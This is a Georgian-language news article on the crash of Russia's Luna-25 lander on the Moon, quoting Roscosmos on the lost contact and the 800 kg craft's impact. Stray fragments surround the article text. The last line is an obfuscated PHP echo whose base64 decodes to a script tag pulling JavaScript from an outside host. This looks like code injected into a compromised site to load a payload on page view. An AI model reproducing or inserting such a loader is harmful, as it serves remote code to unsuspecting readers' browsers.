celsiusi
ავერსი შნაიდერი

რუსულმა უპილოტო კოსმოსურმა ხომალდმა, Luna-25-მა კონტროლი დაკარგა და მთვარის ზედაპირს შეეჯახა. „ბიბისის“ ინფორმაციით, თითქმის 50 წლის განმავლობაში ეს რუსეთის პირველი მისია იყო მთვარეზე.

გამოცემა წერს, რომ Luna-25 უნდა ყოფილიყო პირველი ხომალდი, რომელიც მთვარის სამხრეთ პოლუსზე დაეშვებოდა, თუმცა ის გაუმართაობის გამო განადგურდა.

მისიის მთავარი მიზანი მთვარეზე დაშვებიდან მომდევნო ერთის წლის განმავლობაში მუშაობა და სხვა სადგურების დასაფრენად მომზადება იყო.

რუსეთის სახელმწიფო კოსმოსურმა სააგენტომ, „როსკომოსმა“ შეჯახებამდე რამდენიმე საათით ადრე განაცხადა, რომ მათ დაკარგეს კონტაქტი ხომალდთან.

„წინასწარმა დასკვნებმა აჩვენა, რომ 800 კგ-იანი ხომალდი მთვარის ზედაპირს შეეჯახა და არსებობა შეწყვიტა“, – ნათქვამია „როსკომოსის“ მიერ გავრცელებულ განცხადებაში.

მათივე თქმით, სპეციალური კომისია შეისწავლის, თუ რატომ ვერ განხორციელდა მისია.

ხომალდმა 11 აგვისტოს რუსეთის შორეულ აღმოსავლეთში, ამურის რეგიონში მდებარე „ვოსტოჩნის“ კოსმოდრომიდან აიღო სტარტი და მიმდინარე კვირას წარმატებით გავიდა მთვარის ორბიტაზე.

478
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");